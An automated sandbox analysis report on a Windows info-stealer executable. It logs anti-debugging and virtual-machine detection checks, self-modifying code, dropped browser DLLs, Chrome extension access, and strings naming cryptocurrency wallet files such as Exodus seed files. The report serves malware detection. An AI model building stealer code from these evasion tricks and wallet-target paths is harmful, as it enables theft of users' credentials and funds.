              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6568E2 second address: 6568FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C67h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6568FD second address: 65691D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD001095A66h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65691D second address: 656921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 656921 second address: 65692B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65823E second address: 658242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AA90 second address: 65AA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AB10 second address: 65AB15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AB15 second address: 65AB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65AD59 second address: 65AD5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C3AB second address: 65C3C1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD001095A56h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jbe 00007FD001095A56h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65C3C1 second address: 65C410 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD000CC0C69h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FD000CC0C67h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD000CC0C5Fh 0x00000019 jng 00007FD000CC0C56h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0421 second address: 52E0462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD001095A66h 0x00000009 adc cx, DA78h 0x0000000e jmp 00007FD001095A5Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD001095A60h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0462 second address: 52E04A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD000CC0C66h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD000CC0C67h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E04A3 second address: 52E04A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E04A9 second address: 52E04AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E04FE second address: 52E0531 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD001095A5Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 movsx ebx, cx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0531 second address: 52E0575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 jmp 00007FD000CC0C60h 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FD000CC0C5Eh 0x00000014 sub si, 6248h 0x00000019 jmp 00007FD000CC0C5Bh 0x0000001e popfd 0x0000001f pushad 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E0575 second address: 52E059E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD001095A5Fh 0x0000000a jmp 00007FD001095A63h 0x0000000f popfd 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E059E second address: 52E05A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E05A4 second address: 52E05A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579F99 second address: 579F9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 579F9D second address: 579FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD001095A62h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A17D second address: 57A181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A181 second address: 57A187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A187 second address: 57A18D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57A18D second address: 57A191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E069D second address: 52E06A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52E06A3 second address: 52E06A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3C3CED instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 56CD88 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3C12B6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3C3BF2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3C3C5C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 5F9C3E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018D8C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018D8C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001939B0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001939B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018E270 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018E270
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001943F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_001943F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018BCB0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0018BCB0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018F4F0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018F4F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181710
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00194050 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00194050
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018EB60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018EB60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001933C0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_001933C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DC50 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018DC50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00197970 GetSystemInfo,wsprintfA,0_2_00197970
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: file.exe, file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: AEBKKECB.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: AEBKKECB.0.drBinary or memory string: discord.comVMware20,11696428655f
              Source: AEBKKECB.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: AEBKKECB.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: global block list test formVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: file.exe, 00000000.00000002.2266753838.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: AEBKKECB.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: AEBKKECB.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: AEBKKECB.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: file.exe, 00000000.00000002.2266753838.0000000001401000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5~
              Source: AEBKKECB.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: AEBKKECB.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: AEBKKECB.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: AEBKKECB.0.drBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: AEBKKECB.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: AEBKKECB.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: AEBKKECB.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: AEBKKECB.0.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: AMC password management pageVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: AEBKKECB.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: AEBKKECB.0.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: AEBKKECB.0.drBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: AEBKKECB.0.drBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: AEBKKECB.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarexC
              Source: file.exe, 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: AEBKKECB.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: AEBKKECB.0.drBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: AEBKKECB.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: AEBKKECB.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-59520
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-58333
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-58330
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-58351
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-58385
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-58345
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6D5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6C6D5FF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00184610 VirtualProtect ?,00000004,00000100,000000000_2_00184610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199270 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00199270
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00199160 mov eax, dword ptr fs:[00000030h]0_2_00199160
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00185000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,0_2_00185000
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6AB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C6AB66C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6AB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C6AB1F7
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001990A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_001990A0
              Source: file.exe, file.exe, 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: MeProgram Manager
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6C6AB341 cpuid 0_2_6C6AB341
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00197630
              Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001963C0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_001963C0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001972F0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_001972F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001974D0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_001974D0

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000000.00000002.2266753838.000000000138E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 5320, type: MEMORYSTR
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exeString found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exeString found in binary or memory: jaxx\IndexedDB\file__0.indexeddb.leveldb\
              Source: file.exeString found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exeString found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
              Source: file.exeString found in binary or memory: \Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiD
              Source: file.exeString found in binary or memory: ge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|
              Source: file.exeString found in binary or memory: tream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1
